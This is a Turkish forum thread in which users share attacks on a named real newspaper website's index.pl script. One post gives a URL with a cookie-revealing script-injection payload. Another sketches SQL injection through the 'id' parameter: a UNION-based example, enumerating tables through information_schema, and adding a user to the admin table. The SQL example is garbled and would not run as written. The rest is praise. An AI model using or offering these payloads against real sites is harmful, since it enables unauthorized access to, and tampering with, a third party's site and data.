Açık

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sacrifice
    sacrifice's avatar
    Kayıt Tarihi: 25/Ağustos/2005
    Erkek
    "index.pl" script inin id parametresi SQL command çalıştırılmasına izin veriyor.
    ÖR :
    http://www.rockrivertimes.com/index.pl?cmd=viewstory&cat=2&id=">alert(document.cookie)
    PS: alert' in baş ve sonuna script etiketlerini atmayı unutmayın

    #Coding Sacrifice Perl FSO#
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek
    index.pl de cookiesini almak istediğin yere gel...

    javascript:alert(document.cookie)

    yazısını explorea yaz ve entera tıkla.. cookieni görebilirsin...

    Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek
    bu arada index.pl de koruma yoksa şunu kullanabilirsin tabiki bu sadece örnek gerisini kendin araştırıp bulacaksın

    http://www.rockrivertimes.com/index.pl?cmd=viewstory&cat=2&id=

    yazdıktan sonra idyi bir sayıya eşitleyip daha sonrakı kayıtları ekletip güncelleştirme vs işlemleri için sqldeki union u kullanman lazım örneğin

    http://www.rockrivertimes.com/index.pl?cmd=viewstory&cat=2&id= 1 union update from cat=15

    bu en basitinden en aptalca örneklerden birisiydi. burada bütün categorileri 15 e eşitledik. Aynı şekilde information_schema.tables ı kullanarak tablo adlarını bulabilir ve admin tablosuna yeni user da ekleyebilirsin... sql dökümanlarını ayrıntılı olarak incelersen zor değildir sql injection...

    Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Kayıt Tarihi: 24/Ağustos/2005
    Erkek
    döktürmüş rene hojam yine =)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Kayıt Tarihi: 09/Ağustos/2005
    Erkek
    üstüne bişey söylenmez heralde :)

    Amphetamine Logic.
Toplam Hit: 1298 Toplam Mesaj: 5